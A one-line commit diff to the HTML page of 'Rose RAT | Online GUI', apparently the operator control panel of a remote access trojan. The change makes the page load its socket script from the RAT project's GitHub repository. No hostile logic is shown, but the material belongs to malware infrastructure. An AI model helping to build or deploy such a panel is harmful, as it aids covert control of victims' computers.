script location update

--- a/index.html
+++ b/index.html
@@ -5,7 +5,7 @@
     <meta http-equiv="X-UA-Compatible" content="IE=edge">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
     <title>Rose RAT | Online GUI</title>
-    <script src="guisocket.js"></script>
+    <script src="https://raw.githubusercontent.com/DamagingRose/Rose-RAT/main/guisocket.js"></script>
 </head>
 <body>
     
